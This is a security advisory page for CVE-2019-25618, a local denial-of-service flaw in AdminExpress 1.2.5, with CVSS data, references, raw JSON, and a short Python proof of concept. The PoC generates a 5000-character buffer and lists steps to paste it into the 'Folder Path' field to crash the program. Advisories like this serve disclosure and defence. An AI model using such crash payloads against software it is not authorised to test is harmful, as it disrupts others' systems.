Security Vulnerability Report
CVE-2019-25618 CVSS 6.2 MEDIUM

CVE-2019-25618

Published: 2026-03-22 14:16:31
Last Modified: 2026-04-16 16:19:51

Description

AdminExpress 1.2.5 contains a denial of service vulnerability that allows local attackers to crash the application by submitting oversized input through the System Compare feature. Attackers can paste a large buffer of characters into the Folder Path field and trigger the comparison function to cause the application to become unresponsive or crash.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

AdminExpress 1.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2019-25618 (AdminExpress Denial of Service)
# This script generates a malicious payload to crash the application.

def generate_dos_payload(length=5000):
    """
    Generates a large string buffer to trigger the crash.
    """
    return "A" * length


if __name__ == "__main__":
    # Generate a payload of 5000 characters
    crash_payload = generate_dos_payload(5000)
    print("[+] Payload generated successfully.")
    print(f"[+] Payload length: {len(crash_payload)} characters")
    print("\n[!] Manual Steps to Reproduce:")
    print("1. Launch AdminExpress 1.2.5")
    print("2. Navigate to the 'System Compare' feature")
    print("3. Copy the payload generated below.")
    print("4. Paste the payload into the 'Folder Path' field.")
    print("5. Click the 'Compare' or trigger the function.")
    print("6. Application will become unresponsive or crash.")
    # For demonstration purposes, printing first 100 chars
    print(f"\nPayload preview: {crash_payload[:100]}...")
```

References

https://admin-express.en.softonic.com/
https://www.exploit-db.com/exploits/46711
https://www.vulncheck.com/advisories/adminexpress-denial-of-service-via-system-compare

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2019-25618",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-22T14:16:30.693",
    "lastModified": "2026-04-16T16:19:50.757",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "AdminExpress 1.2.5 contains a denial of service vulnerability that allows local attackers to crash the application by submitting oversized input through the System Compare feature. Attackers can paste a large buffer of characters into the Folder Path field and trigger the comparison function to cause the application to become unresponsive or crash."
      },
      {
        "lang": "es",
        "value": "AdminExpress 1.2.5 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales bloquear la aplicación al enviar una entrada de tamaño excesivo a través de la función System Compare. Los atacantes pueden pegar un búfer grande de caracteres en el campo Folder Path y activar la función de comparación para hacer que la aplicación deje de responder o se bloquee."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.2,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.5,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-73"}]
      }
    ],
    "references": [
      {"url": "https://admin-express.en.softonic.com/", "source": "[email protected]"},
      {"url": "https://www.exploit-db.com/exploits/46711", "source": "[email protected]"},
      {"url": "https://www.vulncheck.com/advisories/adminexpress-denial-of-service-via-system-compare", "source": "[email protected]"}
    ]
  }
}
```